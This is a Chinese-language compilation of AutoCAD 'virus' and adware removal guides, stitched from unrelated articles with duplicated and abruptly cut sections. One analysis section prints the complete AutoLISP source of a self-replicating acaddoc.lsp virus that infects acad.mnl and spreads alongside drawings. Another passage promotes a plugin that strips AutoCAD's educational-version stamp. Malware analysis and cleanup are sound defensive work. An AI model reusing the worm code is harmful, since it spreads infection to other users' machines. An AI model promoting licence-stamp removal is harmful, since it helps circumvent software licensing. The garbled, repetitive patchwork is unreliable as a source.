CAD恶意插件清除方法

CAD中毒解决方案一、背景介绍CAD（计算机辅助设计）是一种广泛应用于工程设计和创造领域的软件工具。

然而，CAD系统也存在一些安全风险，如恶意软件、病毒和黑客攻击等，这可能导致CAD系统中毒。

本文将介绍CAD中毒的常见原因和解决方案。

二、CAD中毒的常见原因1. 恶意软件感染：用户通过下载和安装来自不可信来源的CAD软件或者插件，导致恶意软件感染CAD系统。

2. 病毒攻击：黑客利用漏洞或者弱密码等方式入侵CAD系统，植入病毒程序进行攻击。

3. 文件损坏：CAD文件在传输或者存储过程中被破坏，导致CAD系统无法正常工作。

三、CAD中毒的影响1. 数据丢失：CAD中毒可能导致设计文件损坏或者丢失，给工程项目带来不可估计的损失。

2. 系统崩溃：恶意软件或者病毒攻击可能导致CAD系统崩溃，造成工作中断和生产延误。

3. 安全风险：CAD中毒后，黑客可能窃取敏感设计文件，威胁企业的商业机密。

四、CAD中毒解决方案1. 安全意识培训：加强员工的安全意识培训，教育他们避免下载和安装来自不可信来源的CAD软件或者插件。

2. 定期更新和升级：及时更新CAD软件和操作系统的补丁，修复已知漏洞，提高系统的安全性。

3. 强化密码策略：使用强密码保护CAD系统，定期更换密码，并避免使用易被猜测的密码。

4. 安全备份：定期备份CAD设计文件，并将备份数据存储在离线、安全的位置，以防止文件损坏和丢失。

5. 权限管理：限制用户对CAD系统的访问权限，确保惟独授权人员可以访问和修改设计文件。

6. 安全软件使用：安装并定期更新杀毒软件、防火墙和恶意软件检测工具，及时发现和清除潜在的威胁。

7. 安全审计：定期进行CAD系统的安全审计，检查系统是否受到恶意软件或者黑客攻击，并及时采取措施修复漏洞。

五、CAD中毒的预防措施1. 下载软件可信度：只从官方网站或者可信的软件供应商处下载CAD软件和插件，避免从非官方渠道下载，以防感染恶意软件。

20种恶意插件手工清除方法如今，恶意软件及插件已经成为一种新的网络问题，恶意插件及软件的整体表现为清除困难，强制安装，甚至干拢安全软件的运行。

下面的文章中就给大家讲一部份恶意插件的手工清除方法，恶意插件实在太多，无法做到一一讲解，希望下面的这些方法能为中了恶意插件的网友提供一定的帮助。

1、恶意插件Safobj相关介绍：捆绑安装,系统速度变慢,没有卸载项/无法卸载,强制安装,干扰其它软件正常运行,清除方法：重新注册IE项，修复IE注册。

从开始->运行输入命令 regsvr32 actxprxy.dll 确定输入命令 regsvr32 shdocvw.dll 确定重新启动，下载反间谍专家查有没有ADWARE，spyware，木马等并用其IE修复功能修复IE和注册表，用流氓软件杀手或微软恶意软件清除工具清除一些难卸载的网站插件。

到下载KillBox.exe。

在C:\Program Files\Internet Explorer\目录下，把LIB 目录或Supdate.log删除。

跳窗网页可能保留在HOSTS，一经上网就先触发该网址为默认，就会自动打开，检查HOSTS：用记事本在C:\WINDOWS\system32\drivers\etc\目录下打开HOSTS在里面检查有没有网址，有则删除。

或在前面加127.0.0.1保存后屏蔽掉。

如果是弹出的信使：从开始->运行，输入命令：net stop msgnet stop alert即终止信使服务。

2、恶意插件MMSAssist相关介绍：这其实是一款非常简便易用的彩信发送工具，但它却属于流氓软件!并采用了类似于木马的Hook(钩子)技术，常规的方法也很难删除它，而且很占用系统的资源。

清除方法：方法一：它安装目录里第一个文件夹有个.ini文件，它自动从/updmms/mmsass.cab下载插件包，包里有albus.dll文件，UPX 0.80 - 1.24的壳，脱掉用16位进制软件打开发现这个垃圾插件利用HOOK技术插入到explorer和iexplore中，开机就在后台自动运行。

CAD恶意插件打开CAD出现“现在时间是：……老板的眼睛是雪亮的啦！这是所谓CAD病毒参考以下去除CAD病毒做法运行AutoCAD软件时就会跳出此提示（见图片）：“程序作者QQ：252545152 现在时间是：XX点XX分了的哦！好好干了啦！党是不会亏待你的！老板的眼睛是雪亮的啦！”如果是20：00后再次运行时，提示语变更为：“程序作者QQ:252545152* 现在时间是20点42分了的哦! 快点休息了啦, 要不做CAD的饭碗都让你一个人抢了哦!” 此时使用移动工具将自动变成复制、且无法移动！（注：BAIDU了一下，说法不一，有说是CAD病毒、有何是什么恶意插件、、、总之没人说明详细解决办法！用各类杀软均未发现什么病毒？360插件清理也未发现结果。

？）以下引用病毒作者QQ：252545152的说法和解决办法：有关CAD病毒的说明首先要申明就是:1.它对电脑是没有任意的危害性!2.它在8:00到18:00这段时间,对CAD没有任何影响的!它唯一的副作用就是:你的CAD在启动时会弹出一个显示时间的对话框如果时间时不在8:00至18:00之间还有可能伴随"移动"命令改变~等情况在这时间内的临时解决方案为:将电脑系统时间调整8:00就行了!(有必时请关了CAD后再打开CAD)彻底的解决方案为:(主要是acad.fas程序文件)清除方法是删除干净acad.fas与lcm.fas两个文件!如果删除不净下次启动是还是会生成,务必清理干净!解决办法：1、进入C:\Program Files\autocad***目录，把其子目录下的 acad.fas与lcm.fas删除即可。

（在全部查找时找不到的,请手动进入目录再行查找删除!）2、不想进去目录查找也可以在打开CAD后输入下面字符到CAD命令行然后按回车键即可：(while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a))注意：上面红字一个字都不能少哦！这样就行了!如果有文字编缉时出现记事本的现象请将下面一行红字输入到命令行？：(setvar "mtexted" ".")我已与很多中毒好友用QQ远程帮他们搞好了~你们可以去找找他们问问方法也行，因为我一个人真的是忙不过来啊！！还有就是这个程序不是我传播到网上的（以前是在公司里与同事们搞着玩的,不知道谁搞到网上去了）还有最近可能因为我公布了这个“病毒”的文件名本来是为了方便各位杀毒想不到被一些无聊之人利用，反而近来流传的更多了！（因为最近加我QQ求助的人很多）在这里申明一点！从今天起如果还有人故意散布这个“病毒”我代表CAD同胞们强烈地鄙视它！！！还有今天上网我看到：听说可以杀这个病毒的~有空大家试试/viewthread.php?tid=1272303~（因为我好久没用过CAD了没有测试行不行大家说了算!）也可以自己在百度里找找看！其它解决办法：这是一个专门针对CAD的病毒程序，不是传统意义上的病毒，因此，用诺顿、金山毒霸等是不能杀除的。

CAD中“党是不会亏待你的”恶意程序删除办法
一、病毒发作后的主要表现：
①、病毒在启动CAD时会弹出一个显示时间并写有“党
是不会亏待你”的对话框；
②、病毒在8:00至18:00这个段时间内，对CAD画图没有任何的影响。

当时间不在8:00至18:00之间时，会弹出如下对话框，可能伴随“移动”命令改变~等情况。

二、清除方法：
1、关闭CAD（一定要先关闭正在运行的CAD程序）
2、新建一个文本文件（txt文件）
3、复制如下蓝色内容到文本文件内(不要有任何更改)
@ECHO OFF
ECHO 正在查找并清除CAD病毒文件，请稍候. . .
ECHO.
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
if exist %%i: (
%%i:
ECHO 正在查找%%i 盘
cd\
del /f /q /s acad.fas
del /f /q /s lcm.fas
))
ECHO.
ECHO CAD病毒清除完毕！任意键退出!
Pause>Nul
4、将该文本文件另存为“文件名．bat”，文件名随意（假定另存为１．ｂａｔ）
５、鼠标左键双击１．ｂａｔ，运行该文件，出现如下提示框
请淡定并耐心等待，直至出现如下提示内容
如上图，看到红圈内容出现，按任意键退出程序，再重新打开CAD图纸，一切ok啦！
注：如果下次再出现类似问题，运行该文件即可。

一般情况下，如果没有再次拷贝或者下载带有该恶意程序病毒的CAD文件，运行一次即可清除。

最好用的去除AutoCAD教育版戳记插件，打开保存即可去除
1，下载好该去除AutoCAD教育版戳记插件，为.arx文件,和其他的.lsp文件一样，加载即可使用，我们先来看下如何让插件随AutoCAD启动而自动加载。

打开CAD，
点击启动组，单击该公文包或者内容，
弹出的启动组界面选择，添加，
找到插件的位置，加载要加载的插件到启动组，
这样插件族就加载到自动启动组，
再选择插件文件的位置，选中要加载的插件，点击加载按钮，
这样我们每次启动CAD，加载的CAD就可以使用了。

2，其实方法已经讲完了，我们再来看看去除教育版戳记的实操步骤。

打开CAD，找到对应的版本的插件，我这里使用的CAD版本是64位的2010CAD软件，
我们来看一下win32位插件支持的CAD版本
再来看一下win64位插件支持的CAD版本，
3，明白了自己的CAD版本及插件版本，下面我们以64位CAD2010为例，加载BladeR18_x64文件，方法和第一步介绍的一模一样，加载进入CAD即可使用，很想打开一个带有AutoCAD教育版戳记的图形，但是我是强迫症，我们的图纸都没有带有该戳记的，所以这里演示不了，大家只要加载CAD对应版本的插件即可，然后点击保存，戳记就消失了。

需要软件的私信我，回复去除CAD教育版戳记。

华云旭教育CAD教程：立一等品格，求一等学识，成一等事业！。

20种恶意插件手工清除方法如今，恶意软件及插件已经成为一种新的网络问题，恶意插件及软件的整体表现为清除困难，强制安装，甚至干拢安全软件的运行。

下面的文章中就给大家讲一部份恶意插件的手工清除方法，恶意插件实在太多，无法做到一一讲解，希望下面的这些方法能为中了恶意插件的网友提供一定的帮助。

1、恶意插件Safobj相关介绍：捆绑安装,系统速度变慢,没有卸载项/无法卸载,强制安装,干扰其它软件正常运行,清除方法：重新注册IE项，修复IE注册。

从开始->运行输入命令 regsvr32 actxprxy.dll 确定输入命令 regsvr32 shdocvw.dll 确定重新启动，下载反间谍专家查有没有ADWARE，spyware，木马等并用其IE修复功能修复IE和注册表，用流氓软件杀手或微软恶意软件清除工具清除一些难卸载的网站插件。

到下载KillBox.exe。

在C:\Program Files\Internet Explorer\目录下，把LIB 目录或Supdate.log删除。

跳窗网页可能保留在HOSTS，一经上网就先触发该网址为默认，就会自动打开，检查HOSTS：用记事本在C:\WINDOWS\system32\drivers\etc\目录下打开HOSTS在里面检查有没有网址，有则删除。

或在前面加127.0.0.1保存后屏蔽掉。

如果是弹出的信使：从开始->运行，输入命令：net stop msgnet stop alert即终止信使服务。

2、恶意插件MMSAssist相关介绍：这其实是一款非常简便易用的彩信发送工具，但它却属于流氓软件!并采用了类似于木马的Hook(钩子)技术，常规的方法也很难删除它，而且很占用系统的资源。

清除方法：方法一：它安装目录里第一个文件夹有个.ini文件，它自动从/updmms/mmsass.cab下载插件包，包里有albus.dll文件，UPX 0.80 - 1.24的壳，脱掉用16位进制软件打开发现这个垃圾插件利用HOOK技术插入到explorer和iexplore中，开机就在后台自动运行。

cad病毒acad处理cad病毒acad处理这是一种病毒，但不用重装，可以杀的一、彻底的解决方案1:(主要是acad.fas程序文件)1、清除方法是删除干净acad.fas与lcm.fas两个文件!如果删除不净下次启动是还是会生成,务必清理干净!同时搜acad.lsp和acadapp.lsp删掉2、进入“C:\\Documents and Settings\\用户名\\Application Data\\Autodesk\\AutoCAD 2005\\R16.1\\chs\\support"如果有acad.fas，删除打开acad.mnl，末尾如有不明代码，删除。

清除步骤：1.退出CAD。

2.全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。

搜索时选择“查找所有文件及文件夹”，然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件和文件夹”“搜索子文件夹”。

如果搜出的文件无法删除，则先清空回收站，再搜索删除。

注：探索者目录下有个AcadDoc.lsp（注意大小写）不是病毒文件，谨防误删。

3.查看C盘根目录下是否有boot.dat文件，如有，则将其删除。

4.进入C:\\Documents and Settings\\用户名\\Application Data\\Autodesk\\AutoCAD 2006（或AutoCAD2004）\\R16.2\\chs\\Support目录，用记事本打开该目录下的所有*.mnl文件，手动删除与附件1相同的代码（一般都在文件末尾），然后保存。

并将修改后的所有*.mnl文件属性设置为“只读”。

5.进入CAD安装目录下的support目录，将该目录下的所有*.lsp 文件按步骤4方法处理。

记得将其属性设为“只读”。

CAD病毒是什么怎么清除CAD相信很多学建筑或者图形设计的人们都使用过，那么CAD病毒是什么呢?遇到了怎么解决?本文就来教大家使用手动设置查杀CAD 病毒的方法，具体步骤请看下文。

CAD病毒查杀方法介绍：手动查杀CAD病毒：1、关闭CAD(一定要先关闭正在运行的CAD程序)。

2、搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。

3、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：01(setvar "zoomfactor" 40)02(setvar"mbuttonpan" 1)03(setvar"HIGHLIGHT" 1)04(setvar "fillmode" 1)复制代码4、用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(如"acad.mnl"文件中无此行代码可忽略此操作)附："acad.mnl"文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD 200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD 的版本和版本代号。

(注意：目录C:\Documents and Settings\是系统隐藏文件夹)补充：电脑常见的病毒：1.文件型病毒文件型病毒是一种受感染的可执行文件，也就是.exe病毒文件。

当执行受感染的文件时，电脑病毒会将自己复制到其他可执行文件中，导致其他文件受感染。

AUTOCAD病毒的清除方法acaddoc.lsp是一个专门针对CAD文件的病毒，在CAD软件使用中主要表现的情况如下：1、无法拷贝2、在命令行提示需要执行一个宏3、CAD会出莫名其妙的问题解决方法：关闭AutoCAD程序;搜索所有acaddoc.lsp和acadapq.lsp文件删除所有关acadapq.lsp(3,836字节) 和被感染的acaddoc.lsp(27字节) (看文件大小);重启AutoCAD,OKashan发表LZ还说少了一个步骤：没有处理acad.mnl文件，这样的清除并不彻底，下次再打开带毒的dwg文件（这里并非指dwg文件本身带毒，而是指在该dwg文件下有acaddoc.lsp文件存在）后，系统又会感染病毒，偶曾经对这个cad病毒的代码做过详细分析，下面是原文，有兴趣的朋友可以详细看看：最近自己的电脑中了CAD病毒，症状为打开一个dwg文件后，在该dwg文件所在目录下就会自动生成一个“acaddoc.lsp”文件，即使手工将其删除，下次打开dwg文件时又会自动生成。

如果把dwg文件和acaddoc.lsp文件一起复制到另外一部未感染CAD病毒的电脑上，只要一打开该dwg文件，则该电脑就会被感染。

因为这个CAD病毒是个lisp程序，花了些时间对病毒代码进行分析如下：-----------------下面是病毒代码-----------------------------(setq wold_cmd (getvar "cmdecho"))(setvar "cmdecho" 0)(setq wpath (findfile "base.dcl"))(setq wpath (substr wpath 1 (- (strlen wpath) 8))) ;wpath变量保存ACAD下support目录路径(setq wwmnlwpath (getvar "menuname")) ;获得当前菜单名，这句没有用处，下面并未使用wwmnlwpath变量(setq wnowdwg (getvar "dwgname")) ;获得当前打开图形文件名(setq wwjqm (findfile wnowdwg)) ;wwjqm变量保存当前打开图形文件的完整路径(setq wdwgwpath (substr wwjqm 1( - (strlen wwjqm) (strlen wnowdwg)))) ;wdwgwpath变量保存当前打开图形文件所在路径;;;alert( setq f ( open "c:\\boot.dat" "w")) ;f变量为boot.dat文件句柄，c盘根目录下boot.dat文件若存在则(write-line "[dang]" f) ;打开，不存在则创建，然后将当前打开图形文件所在路径和support(write-line (strcat "ff=" wdwgwpath) f) ;目录路径写入boot.dat文件(write-line (strcat "yy=" wpath) f)(close f)(setq boot (findfile "boot.dat")) ;获得boot.dat文件所在目录完整路径(if (/= boot "") (command "_-vbarun" "ThisDrawing.hh")) ;这句是要运行一个名为“ThisDrawing.hh”的宏，但该宏并不存在(setq wacadwpath (findfile "acaddoc.lsp")) ;wacadwpath变量保存当前加载的acaddoc.lsp文件所在目录(setq wacadwpath (substr wacadwpath 1(- (strlen wacadwpath) 11)))(setq wns1 "" wns2 "")(setq wlspbj 0) ;wlspbj变量是判断support目录下acaddoc.lsp文件是否已感染的;;; ;标志，已感染为1，未感染为0(setq wwjqm (strcat wpath "acaddoc.lsp")) ;wwjqm变量指向support目录下的acaddoc.lsp文件(if (setq wwjm (open wwjqm "r")) ;wwjm变量为打开support目录下的acaddoc.lsp文件的句柄，若打开(progn ;成功则进行处理(while(setq wwz (read-line wwjm)) ;逐行读取acaddoc.lsp文件内容，读取结束后，wns1中是倒数第2行(setq wns1 wns2 ) ;内容，wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，(if (= (substr wns1 8 7) "acadapq") ;若是则已感染(setq wlspbj 1)))(close wwjm)))(setq wlspmnl 0) ;wlspmnl变量是判断support目录下acad.mnl文件是否已感染的标志，;;; ;已感染为1，未感染为0(setq wwjqm (strcat wpath "acad.mnl")) ;wwjqm变量指向support目录下的acad.mnl文件(if (setq wwjm (open wwjqm "r" )) ;wwjm变量为打开support目录下的acad.mnl文件的句柄，若打开(progn ;成功则进行处理(while (setq wwz (read-line wwjm)) ;逐行读取acad.mnl文件内容，读取结束后，wns1中是倒数第2行内容(setq wns1 wns2 ) ;wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，若是则(if (= (substr wns1 8 7) "acadapq") ;已感染(setq wlspmnl 1)))(close wwjm) ;关闭acad.mnl文件))(if (= wlspmnl 0) ;若acad.mnl文件未感染，则写入加载病毒的代码到acad.mnl文件的(progn ;最后2行中(setq wwjqm (strcat wpath(strcat (chr 97) (chr 99) (chr 97)(chr 100) (chr 46) (chr 109)(chr 110) (chr 108)) )) ;障眼法，等于(strcat wpath "acad.mnl")(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(defun wwriteapp ()(if (setq wwjm1 (open wnewacad "w"))(progn(setq wwjm (open woldacad "r"))(while (setq wwz (read-line wwjm))(write-line wwz wwjm1))(close wwjm)(close wwjm1))))(if (and (= wacadwpath wdwgwpath)(/= wacadwpath wpath)) ;若加载的acaddoc.lsp文件和图形文件同目录(progn(if (= 0 wlspmnl) ;acad.mnl文件未感染(progn(setq woldacad (findfile "acaddoc.lsp")) ;在下面调用wwriteapp子程序读取图形文件目录下的acaddoc.lsp文件(setq wnewacad (strcat wpath "acadapq.lsp")) ;的内容，在support目录下创建acadapq.lsp 文件并将acaddoc.lsp) ;文件的内容写入acadapq.lsp文件中;;else （acad.mnl文件已感染）(progn(setq woldacad (strcat wpath "acadapq.lsp" )) ;在下面调用wwriteapp子程序读取support目录下的acadapq.lsp文件(setq wnewacad (findfile "acaddoc.lsp")) ;的内容，写入图形目录下的acaddoc.lsp文件中))(if (= wlspbj 0) ;support目录下的acaddoc.lsp文件未感染(progn ;下面代码将加载病毒程序的代码写入acaddoc.lsp文件的最后2行中(setq wwjqm (strcat wpath "acaddoc.lsp" ))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(wwriteapp));;else （若加载的是support目录下的acaddoc.lsp文件）(progn(if (/= wnowdwg "Drawing.dwg" ) ;当前打开文件不是新建图形文件(progn(setq woldacad (findfile "acadapq.lsp")) ;在图形文件目录下创建acaddoc.lsp文件，将acadapq.lsp(setq wnewacad (strcat wdwgwpath "acaddoc.lsp")) ;文件的内容写入acaddoc.lsp文件中(wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ) ;下面的代码又是个障眼法，没什么作用(setq strtopstr (strcat (chr 92) (chr 92) (chr 70)(chr 83) (chr 49) (chr 92)(chr 83) (chr 89) (chr 83)(chr 49) (chr 92) (chr 87)(chr 79) (chr 82) (chr 75)(chr 92) (chr 80) (chr 76)))-----------------病毒代码到此结束----------------------------从以上对病毒代码的分析可知，该病毒的病毒文件有2个，一个为acadapq.lsp，位于ACAD 安装目录下的support目录下，另一个为acaddoc.lsp，位于当前打开的dwg文件所在目录下，2个病毒文件的内容相同。

CAD中毒解决方案一、背景介绍CAD（计算机辅助设计）是一种广泛应用于工程设计领域的软件工具，它可以帮助工程师进行设计、绘图和模拟等工作。

然而，由于CAD文件的复杂性和重要性，它们往往成为恶意软件攻击的目标。

CAD中毒是指CAD文件受到恶意软件的感染，导致文件损坏、数据泄露或系统崩溃等问题。

二、CAD中毒的危害1. 文件损坏：恶意软件可能会修改CAD文件的内容，导致文件无法正常打开或编辑。

2. 数据泄露：攻击者可以利用恶意软件窃取CAD文件中的敏感信息，如设计方案、机密数据等。

3. 系统崩溃：某些恶意软件可能会导致CAD软件运行异常甚至系统崩溃，影响工程设计进程。

三、CAD中毒解决方案为了保护CAD文件的安全性和完整性，以下是一些CAD中毒解决方案的建议：1. 安装可靠的杀毒软件首先，确保计算机上安装了可靠的杀毒软件，并及时更新病毒库。

杀毒软件能够检测和清除恶意软件，有效防止CAD文件被感染。

2. 定期备份CAD文件定期备份CAD文件是防止数据丢失的重要措施。

将CAD文件备份到外部存储设备或云存储平台，以防止恶意软件感染或其他意外情况导致的数据丢失。

3. 谨慎打开附件和下载文件避免打开来自不可信来源的附件，尤其是包含可执行文件的附件。

此外，只从官方和可信的网站下载CAD文件和插件，以降低感染恶意软件的风险。

4. 更新CAD软件和插件定期更新CAD软件和插件是保持系统安全的重要步骤。

这些更新通常包含安全修复和漏洞补丁，能够提高系统的抵抗恶意软件的能力。

5. 加强网络安全加强网络安全措施可以有效防止恶意软件通过网络传播和入侵系统。

使用防火墙、入侵检测系统和虚拟专用网络（VPN）等技术，限制未经授权的访问和保护CAD文件的安全。

6. 增强员工安全意识加强员工的安全意识培训，教育他们如何辨别和避免恶意软件的攻击。

员工应该知道如何识别可疑的电子邮件、网站和文件，以及如何正确处理和报告安全事件。

7. 定期进行系统安全检查定期进行系统安全检查可以及早发现和清除潜在的恶意软件。

常见AutoCAD病毒(acad.fas、acad.lsp)清除方法
acad.fas、acad.lsp这两种病毒是最常见的CAD病毒了，并且往往同时出现。

由于其本身对系统并不具备危害性，仅仅是恶作剧程序罢了，因此大多数防病毒软件对它们不起作用，下面介绍手动删除方法。

第一步：查找硬盘、U盘内的 acad.fas、lcm.fas、acad.lsp、acadapp.lsp、acadappp.lsp 五个文件并删除干净（查找前请将显示隐藏和系统文件打开，这五个文件不一定同时出现。

强烈建议使用Total Commander文件管理器查找）。

第二步：查找acad.mnl文件（这个文件通常有两个，一个在“c:\Program Files\AutoCAD****\UserDataCache\Support\”文件夹下，另一个在“c:\Documents and Settings\你的用户名\Application
Data\Autodesk\AutoCAD****\R****\chs\Support\”文件夹下。

目前病毒仅修改第一个acad.mnl文件）。

打开acad.mnl文件，在文件末尾找到以下三个语句的组合并删除（这三个语句组合不一定同时出现），然后保存文件。

(if (null stol) (load "lcm" ""))
(princ)
(load "acadapp.lsp")
(princ)
(load "acadappp.lsp")
(princ)。

CAD中毒解决方案在CAD软件使用过程中，有时会遇到一些问题，比如CAD中毒。

CAD中毒是指CAD软件受到病毒或恶意软件的感染，导致软件运行异常或数据丢失。

为了帮助大家解决CAD中毒问题，下面将介绍一些解决方案。

一、及时更新防病毒软件1.1 确保防病毒软件是最新版本，及时更新病毒库，提高病毒检测和清除能力。

1.2 定期进行全盘扫描，发现并清除潜在的病毒威胁。

1.3 避免下载和安装未经验证的软件，以免带入病毒。

二、备份CAD数据2.1 定期备份CAD设计文件，确保数据安全。

2.2 将备份文件存储在安全的地方，避免受到病毒感染。

2.3 在CAD中毒后，可以通过恢复备份文件来避免数据丢失。

三、使用安全的网络环境3.1 避免使用不安全的公共WiFi网络，以免受到网络攻击。

3.2 安装防火墙和安全软件，保护计算机免受网络威胁。

3.3 避免点击可疑链接和下载未知来源的文件，以免引入病毒。

四、定期更新CAD软件4.1 定期检查CAD软件是否有更新版本，及时进行升级。

4.2 更新软件可以修复漏洞和提高软件的稳定性，减少被病毒感染的风险。

4.3 注意官方渠道下载更新，避免下载带有病毒的恶意软件。

五、寻求专业帮助5.1 如果遇到CAD中毒问题无法解决，及时寻求专业的技术支持。

5.2 专业的技术人员可以帮助排除病毒，恢复CAD软件正常运行。

5.3 在解决CAD中毒问题后，可以请技术人员对系统进行全面检查，确保系统安全。

通过以上几点解决方案，可以帮助大家有效应对CAD中毒问题，保护CAD数据的安全和稳定运行CAD软件。

希望大家在CAD设计过程中注意数据安全，避免受到病毒感染。

CAD中毒解决方案一、背景介绍CAD（计算机辅助设计）是一种广泛应用于工程、建造、创造等领域的设计工具。

然而，由于网络安全威胁的增加，CAD系统也成为黑客攻击的目标之一。

CAD中毒是指恶意软件或者病毒感染了CAD系统，导致系统运行异常或者数据丢失的情况。

为了保护CAD系统的安全和稳定运行，我们需要制定相应的解决方案。

二、CAD中毒的影响1. 系统崩溃：恶意软件可能会破坏CAD系统的核心文件，导致系统崩溃，无法正常使用。

2. 数据丢失：恶意软件可能会删除或者篡改CAD系统中的设计文件，导致重要数据丢失，影响工作发展。

3. 安全风险：恶意软件可能会窃取CAD系统中的敏感信息，如设计图纸、商业机密等，给企业带来巨大损失。

三、CAD中毒解决方案1. 安装可靠的防病毒软件：选择一款经过验证的防病毒软件，定期更新病毒库，及时发现和清除恶意软件。

2. 加强系统安全设置：设置强密码，限制用户权限，禁止未知来源的软件安装，提高系统的安全性。

3. 定期备份数据：定期备份CAD系统中的设计文件，确保数据的安全性和可恢复性。

4. 更新CAD软件和补丁：及时安装CAD软件和相关补丁的更新，以修复已知漏洞，提高系统的安全性。

5. 培训员工意识：加强员工对网络安全的意识培训，教育他们警惕恶意软件的攻击手段，避免点击可疑链接或者下载未知来源的文件。

6. 定期安全检查：定期对CAD系统进行安全检查，包括扫描恶意软件、检查系统日志等，及时发现和解决安全问题。

7. 网络隔离：将CAD系统与其他网络系统隔离，减少恶意软件传播的风险，提高CAD系统的安全性。

四、CAD中毒应急响应1. 即将隔离受感染的CAD系统，断开与网络的连接，阻挠恶意软件继续传播。

2. 启动备份数据，恢复受感染的CAD系统到最近一次备份的状态。

3. 运行防病毒软件进行全面扫描，清除恶意软件。

4. 分析感染源，追踪攻击者，采集相关证据，以便后续的安全调查和追责。

5. 加强对CAD系统的安全设置，修复系统漏洞，提升系统的安全性。

CAD中毒解决方案概述：CAD（计算机辅助设计）是一种广泛应用于工程设计和创造领域的技术，它提供了一种便捷和高效的设计工具。

然而，由于各种原因，CAD系统可能会受到恶意软件、病毒或者其他安全威胁的攻击，导致CAD文件被损坏、数据泄露或者系统崩溃等问题。

本文将介绍一些常见的CAD中毒问题，并提供相应的解决方案。

一、CAD中毒问题的种类及影响1. 恶意软件感染：恶意软件是指通过各种方式传播并对系统造成伤害的软件，如病毒、木马、蠕虫等。

CAD系统感染恶意软件可能导致文件损坏、数据泄露、系统崩溃等问题。

2. 网络攻击：CAD系统连接到互联网时，可能受到黑客的攻击，如DDoS攻击、SQL注入等。

这些攻击可能导致系统崩溃、数据泄露、信息被篡改等问题。

3. 社会工程攻击：社会工程攻击是指利用人的心理弱点进行攻击的手段，如钓鱼邮件、诱骗等。

CAD系统受到社会工程攻击可能导致用户密码泄露、系统被入侵等问题。

二、CAD中毒解决方案1. 安装可靠的杀毒软件：为CAD系统安装一款可靠的杀毒软件，定期更新病毒库，并进行全盘扫描。

杀毒软件可以及时检测和清除恶意软件，保护CAD系统的安全。

2. 确保系统和CAD软件的更新：及时安装系统和CAD软件的更新补丁，以修复已知的漏洞和安全问题，提高系统的安全性。

3. 加强网络安全防护：配置防火墙、入侵检测系统（IDS）等网络安全设备，限制CAD系统与外部网络的连接，防止网络攻击对CAD系统造成威胁。

4. 提高用户安全意识：加强用户对社会工程攻击的认识，警惕钓鱼邮件、诱骗等手段。

用户应定期更改密码，避免使用弱密码，并定期备份CAD文件，以防止数据丢失。

5. 数据加密和备份：对CAD文件进行加密，确保数据在传输和存储过程中的安全。

此外，定期备份CAD文件到可靠的存储介质，以防止文件丢失或者损坏。

三、CAD中毒预防措施1. 定期进行系统安全检查：定期对CAD系统进行安全检查，包括检查系统是否感染恶意软件、是否存在安全漏洞等。

“CAD恶意程序”网上也称之为“CAD病毒”。

其实，常见的CAD恶意程序并不具备一般病毒特征，不能单独传染，不会感染系统文件，只能在CAD环境下传播，没有对系统产生危害，但会造成CAD部份命令失效（如：无法使用分解命令、鼠标中键平移被修改、填充不能使用、多段线空心等），使其操作不便，从而影响制图效率及质量。

CAD恶意程序清除工具，支持CAD2002-2010版本。

程序根据“病毒及信任文件”列表搜索、删除CAD恶意程序并清除其加载项。

大家在工作中，打开自己或别人拷贝来的DWG文件前，不要忙着打开CAD，先看看这个DWG图纸目录内，有没有acad.lsp、acad.fas和acad.vlx这些的文件，有就应该立即清除该文件。

这样可以大大减少“CAD恶意程序”传播的机会。

手工清除方法：①、关闭CAD（一定要关闭正在运行中的CAD程序）；②、按F3键或在“开始”菜单打开“搜索”→“文件或文件夹”搜索窗口，全盘搜索下面的已知可能是CAD恶意程序的文件名；acad.lspacad.fasacad.vlxacad.sysacaddoc.lspacadiso.lspacaddoc.fasacadapq.lspacadappp.lspacadapp.lsplcm.fasacadsmu.fas搜索发现文件后，注意该文件的所在目录，判断这个文件是不是你正在使用的某些外挂插件或专业软件所用到的自动加载文件，再决定是否删除。

注意：“搜索范围”一定要选择“本地硬盘(C:;D:;E:;...)”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索系统文件夹”、“搜索隐藏的文件和文件夹”和“搜索子文件夹”项都勾选上，否则不能完全搜索出这些文件。

③、复制代码“(setvar "zoomfactor" 40)(setvar "mbuttonpan" 1)(setvar "highlight" 1)(setvar "fillmode" 1)(setvar "pickauto" 1)”粘贴在CAD命令行，恢复被修改的系统变量；④、清除残留的加载项，复制“(startapp "notepad" (findfile "acad.mnl"))”在CAD命令行，打开“acad.mnl”文件，查看文件内是否有类似“(load "acadappp")”或“(load "acadappp.lsp")”这样的内容，有则删去这些内容后保存“acad.mnl”文件；无可忽略此操作。

方法一：手工清除LINKMEDIA和MSSCKETS的方法2008-05-04 08:37关于清除LINKMEDIA和MSSCKETS 的方法近来发现电脑运行速度奇慢，常常IE无故后台打开。

下载安全卫士360后扫描发现有LINKMEDIA 并且无法清除今天升级后又扫出MSSCKETS 同样删不掉。

经过半个月的网上信息汇总今晚总算成功结果了这两款恶意软件，现向大家介绍经验。

